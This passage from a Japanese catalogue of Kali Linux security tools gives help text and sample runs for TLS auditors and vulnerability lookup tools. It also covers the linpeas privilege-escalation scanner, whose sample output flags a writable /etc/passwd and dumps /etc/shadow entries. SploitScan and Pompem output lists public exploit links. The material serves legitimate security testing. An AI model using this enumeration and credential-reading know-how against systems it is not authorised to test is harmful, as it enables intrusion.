'TOOL' can be a path to openssl executable; default: openssl
--openssl-cnf=FILE --openssl-conf=FILE
'FILE' path of directory or full path of openssl.cnf
If set, environment variable OPENSSL_CONF will be set to given path
(or file) when "openssl(1)" is started. Please see openssl\'s man page
for details about specifying alternate openssl.cnf files.
--openssl-ciphers --force-openssl
Use openssl to check for supported ciphers; default: "IO::Socket(3pm)"
This option forces to use "openssl s_slient -connect CIPHER .." to
check if a cipher is supported by the remote target. This is useful
if the --lib=PATH option doesn\'t work (for example due to changes
of the API or other incompatibilities).
--exe-path=PATH
--exe=PATH
'PATH' is a full path where to find openssl.
--lib-path=PATH
--lib=PATH
'PATH' is a full path where to find libssl.so, libcrypto.so.
See HACKER\'s INFO below for a detailed description how it works.
--envlibvar=NAME
'NAME' is the name of a environment variable containing additional
paths for searching dynamic shared libraries.
Default is LD_LIBRARY_PATH.
Check your system for the proper name, for example:
DYLD_LIBRARY_PATH, LIBPATH, RPATH, SHLIB_PATH.
--ssl-error
The connection to a target may fail, or even block, due to various
reasons for example lost network at all, blocking at firewall, etc.
In particular when checking ciphers with +cipher , this may result
in long delays until results are printed.
Using this option stops trying to do more connections to the target
when --ssl-error-max=CNT consecutive errors occoured, or when the
total amount of errors increases --ssl-error-total=CNT.
Note that this may result in loss of information and/or checks.
--ssl-error-max=CNT
Max. amount of consecutive errors (default: 5).
--ssl-error-timeout=SEC
Timeout in seconds when a failed connection is treated as error and
then counted (default: 1).
--ssl-error-total=CNT
Max. total amount of errors (default: 10).
--ssl-lazy
I.g. this tools tries to identify available functionality according
SSL versions from the underlaying libraries. Unsupported versions
are then disables and a warning is shown.
Unfortunately some libraries have not implemented all functions to
check availability of a specific SSL version, which then results in
a compile error.
This option disables the strict check of availability.
If the underlaying library doesn\'t support the required SSL version
at all, following error may occour:
Can\'t locate auto/Net/SSLeay/CTX_v2_new.al in @INC ...
See Note on SSL versions for a general note about SSL versions.
A more detailled description of the problem and how Net::SSLeay be-
haves, can be found in the source of o-saft.pl ,
see section starting at
#| check for supported SSL versions
--timeout=SEC
Timeout in seconds when connecting to the target (default: 2).
--call=METHOD
'METHOD' method to be used for specific functionality
Available methods:
* 'info-socket' use internal socket to retrieve information
* 'info-openssl' use external openssl to retrieve information
* 'info-user' use usr_getinfo() to retrieve information
* 'cipher-socket' use internal socket to ckeck for ciphers
* 'cipher-openssl' use external openssl to ckeck for ciphers
* 'cipher-user' use usr_getciphers() to ckeck for ciphers
Method names starting with:
* 'info-'
are responsible to retrieve information about the SSL connection
and the target certificate (i.e. what the +info command provides)
* 'cipher-'
are responsible to connect to the target and test if it supports
the specified ciphers (i.e. what the +cipher command provides)
* 'check-'
are responsible for performing the checks (i.e. what\'s shown with
the +check command)
* 'score-'
are responsible to compute the score based on check results
The second part of the name denotes which kind of method to call:
* 'socket' the internal functionality with sockets is used
* 'openssl' the exteranl openssl executable is used
* 'user' the external special function, as specified in user\'s
o-saft-usr.pm, is used.
Example:
--call=cipher-openssl
will use the external "openssl(1)" executable to check the target for
supported ciphers.
Default settings are:
--call=info-socket --call=cipher-socket --call=check-socket
Just for curiosity, instead of using:
o-saft.pl --call=info-user --call=cipher-user --call=check-user --call=score-user ...
consider to use your own script like:
#!/usr/bin/env perl
usr_getinfo();usr_getciphers();usr_checkciphers();usr_score();
:-))
-v
Print list of ciphers in style like: "openssl ciphers -v".
Option used with +ciphers command only.
-V
Print list of ciphers in style like: "openssl ciphers -V".
Option used with +ciphers command only.
[...]
■ 使用例
root@kali:~# o-saft --legacy=quick --no-header +info example.com
Certificate Version 3 (0x2)
Certificate Common Name www.example.org
Certificate Subject /C=US/ST=California/L=Los Angeles/O=Internet\xC2\xA0Corporation\xC2\xA0for\xC2\xA0Assigned\xC2\xA0Names\xC2\xA0and\xC2\xA0Numbers/CN=www.example.org
Certificate Subject Name Hash df4c0278
Certificate Issuer /C=US/O=DigiCert Inc/CN=DigiCert Global G2 TLS RSA SHA256 2020 CA1
Certificate Issuer Name Hash 9f4c149e
Certificate Serial Number 07:5b:ce:f3:06:89:c8:ad:df:13:e5:1a:f4:af:e1:87
Certificate Fingerprint SHA1 Fingerprint=4DA25A6D5EF62C5F95C7BD0A73EA3C177B36999D
Certificate Fingerprint Algorithm SHA1
Certificate Fingerprint Hash Value 4DA25A6D5EF62C5F95C7BD0A73EA3C177B36999D
Certificate Fingerprint SHA2 EFBA26D8C1CE3779AC77630A90F82163A3D6892ED6AFEE408672CF19EBA7A362
Certificate Fingerprint SHA1 4DA25A6D5EF62C5F95C7BD0A73EA3C177B36999D
Certificate Fingerprint MD5 83DC5195F21734E988900A3688DDFED4
Certificate valid since Jan 30 00:00:00 2024 GMT
Certificate valid until Mar 1 23:59:59 2025 GMT
Certificate Validity (date) Jan 30 00:00:00 2024 GMT .. Mar 1 23:59:59 2025 GMT
Certificate Email Addresses
[...]
Certificate Subject\'s Alternate Names DNS:www.example.org DNS:example.net DNS:example.edu DNS:example.com DNS:example.org DNS:www.example.com DNS:www.example.edu DNS:www.example.net
Validity Alternate Names Given hostname 'example.com' matches alternate name 'example.com' in certificate
Validity Hostname Given hostname 'example.com' does not match CN 'www.example.org' in certificate
Validity Certificate Chain 0 (ok)
CA Chain Verification error ok
Target supports Compression NONE
Target supports Expansion NONE
Target supports Heartbeat
Target supports Extended Master Secret
Target\'s Resumption PSK
Target supports Resumption no
Target supports Renegotiation renegotiation.
!!Hint: checks only if renegotiation is implemented server-side according RFC 5746
Target supports SRP
Target supports Krb5
Target supports PSK
Target supports PSK Identity Hint
Target\'s OCSP Response Response Status: successful (0x0); Cert Status: good; This Update: Oct 25 15:51:02 2024 GMT; Next Update:
Target\'s supported ALPNs http/1.1,h2
Target\'s supported NPNs
Target\'s selected protocol (ALPN)
Target\'s selected protocol (NPN)
Target\'s advertised protocols
Target\'s Server public key length 2048 bit
Target\'s DH Parameter ECDH, prime256v1, 256 bits
Target\'s Master-Key
Target\'s Session-ID
Target\'s Session-ID-ctx
Target\'s TLS Session Ticket
Target\'s TLS Session Ticket Lifetime
Target\'s TLS Session Start Time locale Thu Jan 1 00:00:00 1970
Target\'s TLS Session Start Time EPOCH
Target\'s fallback SSL Protocol TLSv1_3
[...]
PEASS-ng
ホスト内の可能性のある設定ミス(既知の脆弱性、ユーザー、プロセス、ファイルパーミッション、特殊なファイルパーミッション、読み取り/書き込み可能なファイルなど)を検索して列挙します。
■ 使用方法
root@kali:~# linpeas.sh -h
Checks:
-a Perform all checks: 1 min of processes, su brute, and extra checks.
-o Only execute selected checks (system_information,container,cloud,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_perms_files,interesting_files,api_keys_regex). Select a comma separated list.
-s Stealth & faster (don\'t check some time consuming checks)
-e Perform extra enumeration
-r Enable Regexes (this can take from some mins to hours)
-P Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su'
-D Debug mode
Network recon:
-t Automatic network scan - This option writes to files
-d <IP/NETMASK> Discover hosts using fping or ping. Ex: -d 192.168.0.1/24
-p <PORT(s)> -d <IP/NETMASK> Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don\'t want to add more). You can also add a list of ports. Ex: -d 192.168.0.1/24 -p 53,139
-i <IP> [-p <PORT(s)>] Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead. Ex: -i 127.0.0.1 -p 53,80,443,8000,8080
Notice that if you specify some network scan (options -d/-p/-i but NOT -t), no PE check will be performed
Port forwarding (reverse connection):
-F LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT Execute linpeas to forward a port from a your host (LOCAL_IP:LOCAL_PORT) to a remote IP (REMOTE_IP:REMOTE_PORT)
Firmware recon:
-f </FOLDER/PATH> Execute linpeas to search passwords/file permissions misconfigs inside a folder
Misc:
-h To show this message
-w Wait execution between big blocks of checks
-L Force linpeas execution
-M Force macpeas execution
-q Do not show banner
-N Do not use colours
■ 使用例
root@kali:~# ./linpeas.sh -o interesting_perms_files -q
[...]
╔════════════════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 12K Nov 22 2007 /usr/bin/netkit-rlogin
-rwsr-xr-x 1 root root 13K Dec 10 2007 /usr/bin/traceroute6.iputils
-rwsr-sr-x 1 root root 7.3K Jun 25 2008 /usr/bin/X
-rwsr-xr-x 1 root root 46K Mar 31 2008 /usr/bin/mtr
-rwsr-xr-x 1 root root 37K Apr 2 2008 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 11K Dec 10 2007 /usr/bin/arping
[...]
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root utmp 300K Jan 2 2009 /usr/bin/xterm ---> Solaris_5.5.1_X11R6.3(05-1997)/Debian_xterm_version_222-1etch2(01-2009)
-rwxr-sr-x 1 root shadow 38K Apr 2 2008 /usr/bin/chage
-rwsr-sr-x 1 root root 7.3K Jun 25 2008 /usr/bin/X
-rwxr-sr-x 1 root tty 9.8K Apr 14 2008 /usr/bin/wall
-rwxr-sr-x 1 root utmp 302K Oct 23 2007 /usr/bin/screen ---> GNU_Screen_4.5.0
[...]
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
══╣ Current shell capabilities
CapInh: 0000000000000000
CapPrm: 00000000a80435fb
CapEff: 00000000a80435fb
CapBnd: 00000000a80435fb
CapAmb: 0000000000000000
══╣ Parent proc capabilities
CapInh: 0000000000000000
CapPrm: 00000000a80435fb
CapEff: 00000000a80435fb
CapBnd: 00000000a80435fb
CapAmb: 0000000000000000
Files with capabilities (limited to 50):
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 720 Mar 28 2008 usr.sbin.mysqld
-rw-r--r-- 1 root root 725 Apr 9 2008 usr.sbin.named
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. root:*:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:*:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
[...]
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. ═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. total 900
drwxr-xr-x 1 root root 4096 Nov 2 18:29 .
drwxr-xr-x 1 root root 4096 Nov 2 18:28 ..
-rw------- 1 root root 536 Nov 2 18:24 .Xauthority
lrwxrwxrwx 1 root root 9 May 14 2012 .bash_history -> /dev/null
-rw-r--r-- 1 root root 2227 Oct 20 2007 .bashrc
drwx------ 3 root root 4096 May 20 2012 .config
[...]
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/msfadmin/.bash_history
/home/msfadmin/.distcc/lock
/home/msfadmin/.distcc/lock/cpu_localhost_0
/home/ftp
/root/
[...]
Pompem
以下のデータソースから指定されたキーワードで脆弱性情報を検索します。
- PacketStorm security
- CXSecurity
- ZeroDay
- Vulners
- National Vulnerability Database
- WPScan Vulnerability Database
■ 使用方法
root@kali:~# pompem --help
Options:
-h, --help show this help message and exit
-s, --search <keyword,keyword,keyword> text for search
--txt Write txt File
--html Write html File
--update upgrade to latest version
-g, --get Download exploit files
■ 使用例
root@kali:~# pompem -s wordpress
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+Date Description Url
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+ 2024-10-31 | WordPress Automatic 3.92.0 Path Traversal / Server | https://packetstormsecurity.com/files/182428/WordPress-Automatic-3.92.0-Path-Traversal-Server-Side-Request-Forgery.html
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+ 2024-10-30 | WordPress WP-Automatic SQL Injection | https://packetstormsecurity.com/files/182408/WordPress-WP-Automatic-SQL-Injection.html
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+ 2024-10-14 | WordPress File Manager Advanced Shortcode 2.3.2 Co | https://packetstormsecurity.com/files/182169/WordPress-File-Manager-Advanced-Shortcode-2.3.2-Code-Injectin-Shell-Upload.html
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+ 2024-10-03 | WordPress Bricks Builder Theme 1.9.6 Code Injectio | https://packetstormsecurity.com/files/181987/WordPress-Bricks-Builder-Theme-1.9.6-Code-Injection.html
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+ 2024-10-03 | WordPress Hash Form 1.1.0 Code Injection | https://packetstormsecurity.com/files/181986/WordPress-Hash-Form-1.1.0-Code-Injection.html
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
[...]
qsslcaudit
SSL/TLSクライアントのセキュリティテストを行います。
■ 使用方法
root@kali:~# qsslcaudit --help
Usage: qsslcaudit [options]
SSL client tests:
1: (certs) custom certificate trust
certificate trust test with user-supplied certificate
2: (certs) self-signed certificate for target domain trust
certificate trust test with self-signed certificate for user-supplied common name
3: (certs) self-signed certificate for invalid domain trust
certificate trust test with self-signed certificate for www.example.com
4: (certs) custom certificate for target domain trust
certificate trust test with user-supplied common name signed by user-supplied certificate
5: (certs) custom certificate for invalid domain trust
certificate trust test with www.example.com common name signed by user-supplied certificate
6: (certs) certificate for target domain signed by custom CA trust
certificate trust test with user-supplied common name signed by user-supplied CA certificate
7: (certs) certificate for invalid domain signed by custom CA trust
certificate trust test with www.example.com common name signed by user-supplied CA certificate
8: (protos) SSLv2 protocol support
test for SSLv2 protocol support
9: (protos) SSLv3 protocol support
test for SSLv3 protocol support
10: (ciphers) SSLv3 protocol and EXPORT grade ciphers support
test for SSLv3 protocol and EXPORT grade ciphers support
11: (ciphers) SSLv3 protocol and LOW grade ciphers support
test for SSLv3 protocol and LOW grade ciphers support
12: (ciphers) SSLv3 protocol and MEDIUM grade ciphers support
test for SSLv3 protocol and MEDIUM grade ciphers support
13: (protos) TLS 1.0 protocol support
test for TLS 1.0 protocol support
14: (ciphers) TLS 1.0 protocol and EXPORT grade ciphers support
test for TLS 1.0 protocol and EXPORT grade ciphers support
15: (ciphers) TLS 1.0 protocol and LOW grade ciphers support
test for TLS 1.0 protocol and LOW grade ciphers support
16: (ciphers) TLS 1.0 protocol and MEDIUM grade ciphers support
test for TLS 1.0 protocol and MEDIUM grade ciphers support
17: (ciphers) TLS 1.1 protocol and EXPORT grade ciphers support
test for TLS 1.1 protocol and EXPORT grade ciphers support
18: (ciphers) TLS 1.1 protocol and LOW grade ciphers support
test for TLS 1.1 protocol and LOW grade ciphers support
19: (ciphers) TLS 1.1 protocol and MEDIUM grade ciphers support
test for TLS 1.1 protocol and MEDIUM grade ciphers support
20: (ciphers) TLS 1.2 protocol and EXPORT grade ciphers support
test for TLS 1.2 protocol and EXPORT grade ciphers support
21: (ciphers) TLS 1.2 protocol and LOW grade ciphers support
test for TLS 1.2 protocol and LOW grade ciphers support
22: (ciphers) TLS 1.2 protocol and MEDIUM grade ciphers support
test for TLS 1.2 protocol and MEDIUM grade ciphers support
23: (ciphers) DTLS 1.0 protocol and EXPORT grade ciphers support
test for DTLS 1.0 protocol and EXPORT grade ciphers support
24: (ciphers) DTLS 1.0 protocol and LOW grade ciphers support
test for DTLS 1.0 protocol and LOW grade ciphers support
25: (ciphers) DTLS 1.0 protocol and MEDIUM grade ciphers support
test for DTLS 1.0 protocol and MEDIUM grade ciphers support
26: (ciphers) DTLS 1.2 protocol and EXPORT grade ciphers support
test for DTLS 1.2 protocol and EXPORT grade ciphers support
27: (ciphers) DTLS 1.2 protocol and LOW grade ciphers support
test for DTLS 1.2 protocol and LOW grade ciphers support
28: (ciphers) DTLS 1.2 protocol and MEDIUM grade ciphers support
test for DTLS 1.2 protocol and MEDIUM grade ciphers support
29: (certs) CVE-2020-0601 ECC cert trust
test for trusting certificate signed by private key with custom curve
Options:
-h, --help Displays help on commandline options.
--help-all Displays help including Qt specific options.
-v, --version Displays version information.
-l, --listen-address <0.0.0.0> listen on <address>
-p, --listen-port <8443> bind to <port>
--user-cn <example.com> common name (CN) to suggest to client
--server <https://example.com> grab certificate information from <server>
--user-cert <~/host.cert> path to file containing custom certificate
(or chain of certificates)
--user-key <~/host.key> path to file containing custom private key
--user-ca-cert <~/ca.cert> path to file containing custom certificate
usable as CA
--user-ca-key <~/ca.key> path to file containing custom private key
for CA certificate
--selected-tests <1,3,5> comma-separated list of tests (id) to execute
--forward <127.0.0.1:6666> forward connection to upstream proxy
--show-ciphers show ciphers provided by loaded openssl
library
--starttls <ftp|smtp|xmpp> exchange specific STARTTLS messages before
starting secure connection
--loop-tests infinitely repeat selected tests (use Ctrl-C
to kill the tool)
-w, --wait-data-timeout <5000> wait for incoming data <ms> milliseconds
before emitting error
--output-xml <qsslcaudit.xml> save results in XML
--pid-file </tmp/qs.pid> create a pidfile once initialized
--dtls use DTLS protocol over UDP
--double-first-test execute the first test two times and ignore
its client fingerprint
■ 使用例
# テスト2(self-signed certificate for target domain trust)を実行
root@kali:~# qsslcaudit -l 0.0.0.0 --selected-tests 2 --user-cn evil.domain.tld
preparing selected tests...
SSL library used: OpenSSL 1.0.2u 20 Dec 2019
running test #2: certificate trust test with self-signed certificate for user-supplied common name
listening on 0.0.0.0:8443
# HTTPieを使ってエンドポイントにリクエストを送信
root@kali:~# https 192.168.11.3:8443
https: error: SSLError: ...
# テスト結果(合格)が表示される
root@kali:~# qsslcaudit -l 0.0.0.0 --selected-tests 2 --user-cn evil.domain.tld
[...]
report:
client did not accept fake certificate
result: PASSED
test finished
tests results summary table:
+----+------------------------------------+------------+-----------------------------+
| ## | Test Name | Result | Comment |
+----+------------------------------------+------------+-----------------------------+
| 2 | self-signed certificate for target | PASSED | |
| | domain trust | | |
+----+------------------------------------+------------+-----------------------------+
[...]
# PHP5.2.xの関数を使ってエンドポイントにリクエストを送信
root@kali:~# php -r "file_get_contents('https://192.168.11.3:8443');"
Warning: file_get_contents(https://192.168.11.3:8443): failed to open stream: HTTP request failed! in Command line code on line 1
# テスト結果(不合格)が表示される
root@kali:~# qsslcaudit -l 0.0.0.0 --selected-tests 2 --user-cn evil.domain.tld
[...]
report:
test failed, client accepted fake certificate, data was intercepted
result: FAILED
test finished
tests results summary table:
+----+------------------------------------+------------+-----------------------------+
| ## | Test Name | Result | Comment |
+----+------------------------------------+------------+-----------------------------+
| 2 | self-signed certificate for target | FAILED !!! | mitm possible |
| | domain trust | | |
+----+------------------------------------+------------+-----------------------------+
[...]
SploitScan
脆弱性および関連するエクスプロイトの詳細な情報を提供します。
■ 使用方法
root@kali:~# sploitscan --help
usage: sploitscan [-h] [-e {json,JSON,csv,CSV,html,HTML}] [-t {nessus,nexpose,openvas,docker}] [-i IMPORT_FILE] [-c CONFIG] [-d] [cve_ids ...]
positional arguments:
cve_ids Enter one or more CVE IDs to fetch data. Separate multiple CVE IDs with spaces. Format for each ID: CVE-YYYY-NNNNN.
This argument is optional if an import file is provided using the -i option.
options:
-h, --help show this help message and exit
-e {json,JSON,csv,CSV,html,HTML}, --export {json,JSON,csv,CSV,html,HTML}
Optional: Export the results to a JSON, CSV, or HTML file. Specify the format: 'json', 'csv', or 'html'.
-t {nessus,nexpose,openvas,docker}, --type {nessus,nexpose,openvas,docker}
Specify the type of the import file: 'nessus', 'nexpose', 'openvas' or 'docker'.
-i IMPORT_FILE, --import-file IMPORT_FILE
Path to an import file from a vulnerability scanner. If used, CVE IDs can be omitted from the command line arguments.
-c CONFIG, --config CONFIG
Path to a custom config file.
-d, --debug Enable debug output.
■ 使用例
root@kali:~# sploitscan CVE-2024-44000
╔════════════════════════╗
║ CVE ID: CVE-2024-44000 ║
╚════════════════════════╝
┌───[ 🔍 Vulnerability information ]
|
├ Published: 2024-10-20
├ Base Score: 9.8 (CRITICAL)
├ Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
└ Description: Insufficiently Protected Credentials vulnerability in LiteSpeed Technologies LiteSpeed Cache allows
Authentication Bypass.This issue affects LiteSpeed Cache: from n/a before 6.5.0.1.
┌───[ ♾️ Exploit Prediction Score (EPSS) ]
|
└ EPSS Score: 54.81% Probability of exploitation.
┌───[ 🛡️ CISA KEV Catalog ]
|
└ ❌ No data found.
┌───[ 💣 Public Exploits (Total: 5) ]
|
├ GitHub
│ ├ Date: 2024-10-31 - https://github.com/zgimszhd61/CVE-2024-44000
│ ├ Date: 2024-10-11 - https://github.com/geniuszlyy/CVE-2024-44000
│ ├ Date: 2024-09-16 - https://github.com/ifqygazhar/CVE-2024-44000-LiteSpeed-Cache
│ ├ Date: 2024-09-06 - https://github.com/gbrsh/CVE-2024-44000
│ └ Date: 2024-09-06 - https://github.com/absholi7ly/CVE-2024-44000-LiteSpeed-Cache
│
└ Other
├ PacketStorm: https://packetstormsecurity.com/search/?q=CVE-2024-44000
└ Nuclei: https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2024/CVE-2024-44000.yaml
┌───[ 🕵️ HackerOne Hacktivity ]
|
├ Rank: 7141
├ Reports: 0
└ Severity: Unknown: 0 / None: 0 / Low: 0 / Medium: 0 / High: 0 / Critical: 0
┌───[ 🤖 AI-Powered Risk Assessment ]
|
|
| 1. Risk Assessment
| -------------------
|
| The vulnerability identified as CVE-2024-44000 is a critical security issue affecting LiteSpeed
| Technologies\' LiteSpeed Cache versions prior to 6.5.0.1. This vulnerability is classified as
| Insufficiently Protected Credentials, leading to an authentication bypass risk. With a CVSS base
| score of 9.8, its criticality stems from ease of exploitation, requiring no privileges and
| interaction, occurring over a network vector. Exploitation can severely impact business operations
| by compromising confidentiality, integrity, and availability. An unauthenticated attacker could
| potentially gain control over affected repositories, leading to unauthorized data access,
| modification, or even denial of service to legitimate users. Given the EPSS score of 0.548080000,
| there is a moderate likelihood of this vulnerability being exploited in the wild if not promptly
| addressed. However, the current standing with CISA shows no active incidents linked to ransomware
| attacks leveraging this flaw.
|
| 2. Potential Attack Scenarios
| ------------------------------
|
| A potential attack scenario involves an external attacker targeting an organization\'s online
| assets using LiteSpeed Cache. By exploiting the insufficiently protected credentials flaw, the
| attacker can perform an authentication bypass without requiring user interaction or elevated
| privileges. The attacker transmits malicious payloads to the vulnerable system over the network.
| This exploitation allows unauthorized access to the administrative functionalities of the affected
| site. The attacker could then exfiltrate sensitive data, modify critical configurations, or inject
| ransomware, potentially leading to a total systemic compromise or prolonged downtime affecting
| service availability.
|
| 3. Mitigation Recommendations
| ------------------------------
|
| Immediate action is required to mitigate this vulnerability effectively. Organizations should
| ensure that all instances of LiteSpeed Cache are updated to version 6.5.0.1 or higher, where the
| vulnerability is addressed, and the security flaw is patched. It\'s crucial to regularly check for
| updates from the vendor and apply them promptly. Network administrators should review access logs
| for any signs of suspicious activities indicating an exploitation attempt. Additional
| administrative controls, such as enhancing authentication mechanisms or implementing stricter
| access policies, can provide layers of security. Reference resources, such as the Patchstack
| advisories, provide extensive guidance on securing LiteSpeed Cache implementations and further
| protective measures can be found at: https://patchstack.com/database/vulnerability/litespeed-
| cache/wordpress-litespeed-cache-plugin-6-5-0-1-unauthenticated-account-takeover-
| vulnerability?_s_id=cve
|
| 4. Executive Summary
| ---------------------
|
| CVE-2024-44000 is a critical vulnerability affecting LiteSpeed Cache, allowing attackers to bypass
| authentication due to insufficiently protected credentials. The gravity of this vulnerability is
| underscored by its high CVSS score of 9.8, indicating extreme risk to confidentiality, integrity,
| and availability. Rapid exploitation techniques in circulation heighten the urgency to apply the
| recommended patch to version 6.5.0.1 or newer. Organizations utilizing vulnerable versions face
| significant risks, including unauthorized access to sensitive data and potential disruption of
| services. Prompt mitigation is not only a technical necessity but a business imperative to
| safeguard critical assets and maintain trust with stakeholders. Addressing this vulnerability
| decisively and urgently is vital in preempting potential compromises and ensuring the continuity
| of secure operations.
|
└────────────────────────────────────────
┌───[ ⚠️ Patching Priority Rating ]
|
└ Priority: A+
┌───[ 📚 Further References ]
|
├ https://patchstack.com/database/vulnerability/litespeed-cache/wordpress-litespeed-cache-plugin-6-5-0-1-unauthenticated-account-takeover-vulnerability?_s_id=cve
└ https://patchstack.com/articles/critical-account-takeover-vulnerability-patched-in-litespeed-cache-plugin?_s_id=cve
sslscan
SSL/TLS サービス(HTTPS など)を照会し、プロトコルのバージョン、暗号スイート、鍵交換、署名アルゴリズム、および使用中の証明書を表示します。
■ 使用方法
root@kali:~# sslscan --help
Command:
sslscan [options] [host:port | host]
Options:
--targets=<file> A file containing a list of hosts to check.
Hosts can be supplied with ports (host:port)
--sni-name=<name> Hostname for SNI
--ipv4, -4 Only use IPv4
--ipv6, -6 Only use IPv6
--show-certificate Show full certificate information
--show-certificates Show chain full certificates information
--show-client-cas Show trusted CAs for TLS client auth
--no-check-certificate Don\'t warn about weak certificate algorithm or keys
--ocsp Request OCSP response from server
--pk=<file> A file containing the private key or a PKCS#12 file
containing a private key/certificate pair
--pkpass=<password> The password for the private key or PKCS#12 file
--certs=<file> A file containing PEM/ASN1 formatted client certificates
--ssl2 Only check if SSLv2 is enabled
--ssl3 Only check if SSLv3 is enabled
--tls10 Only check TLSv1.0 ciphers
--tls11 Only check TLSv1.1 ciphers
--tls12 Only check TLSv1.2 ciphers
--tls13 Only check TLSv1.3 ciphers
--tlsall Only check TLS ciphers (all versions)
--show-ciphers Show supported client ciphers
--show-cipher-ids Show cipher ids
--iana-names Use IANA/RFC cipher names rather than OpenSSL ones
--show-times Show handhake times in milliseconds
--no-cipher-details Disable EC curve names and EDH/RSA key lengths output
--no-ciphersuites Do not check for supported ciphersuites
--no-compression Do not check for TLS compression (CRIME)
--no-fallback Do not check for TLS Fallback SCSV
--no-groups Do not enumerate key exchange groups
--no-heartbleed Do not check for OpenSSL Heartbleed (CVE-2014-0160)
--no-renegotiation Do not check for TLS renegotiation
--show-sigs Enumerate signature algorithms
--starttls-ftp STARTTLS setup for FTP
--starttls-imap STARTTLS setup for IMAP
--starttls-irc STARTTLS setup for IRC
--starttls-ldap STARTTLS setup for LDAP
--starttls-mysql STARTTLS setup for MYSQL
--starttls-pop3 STARTTLS setup for POP3
--starttls-psql STARTTLS setup for PostgreSQL
--starttls-smtp STARTTLS setup for SMTP
--starttls-xmpp STARTTLS setup for XMPP
--xmpp-server Use a server-to-server XMPP handshake
--rdp Send RDP preamble before starting scan
--bugs Enable SSL implementation bug work-arounds
--no-colour Disable coloured output
--sleep=<msec> Pause between connection request. Default is disabled
--timeout=<sec> Set socket timeout. Default is 3s
--connect-timeout=<sec> Set connect timeout. Default is 75s
--verbose Display verbose output
--version Display the program version
--xml=<file> Output results to an XML file. Use - for STDOUT.
--help Display the help text you are now reading
■ 使用例
root@kali:~# sslscan example.com
Testing SSL server example.com on port 443 using SNI name example.com
SSL/TLS Protocols:
SSLv2 disabled
SSLv3 disabled
TLSv1.0 enabled
TLSv1.1 enabled
TLSv1.2 enabled
TLSv1.3 enabled
TLS Fallback SCSV:
Server supports TLS Fallback SCSV
TLS renegotiation:
Secure session renegotiation supported
TLS Compression:
Compression disabled
Heartbleed:
TLSv1.3 not vulnerable to heartbleed
TLSv1.2 not vulnerable to heartbleed
TLSv1.1 not vulnerable to heartbleed
TLSv1.0 not vulnerable to heartbleed
Supported Server Cipher(s):
Preferred TLSv1.3 256 bits TLS_AES_256_GCM_SHA384 Curve P-256 DHE 256
Accepted TLSv1.3 256 bits TLS_CHACHA20_POLY1305_SHA256 Curve P-256 DHE 256
Accepted TLSv1.3 128 bits TLS_AES_128_GCM_SHA256 Curve P-256 DHE 256
Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
[...]
Server Key Exchange Group(s):
TLSv1.3 128 bits secp256r1 (NIST P-256)
TLSv1.2 128 bits secp256r1 (NIST P-256)
SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength: 2048
Subject: www.example.org
Altnames: DNS:www.example.org, DNS:example.net, DNS:example.edu, DNS:example.com, DNS:example.org, DNS:www.example.com, DNS:www.example.edu, DNS:www.example.net
Issuer: DigiCert Global G2 TLS RSA SHA256 2020 CA1
Not valid before: Jan 30 00:00:00 2024 GMT
Not valid after: Mar 1 23:59:59 2025 GMT
SSLyze
サーバーのSSL/TLS設定を分析します。
■ 使用方法
root@kali:~# sslyze --help
usage: sslyze [-h] [--update_trust_stores] [--cert CERTIFICATE_FILE] [--key KEY_FILE] [--keyform KEY_FORMAT] [--pass PASSPHRASE]
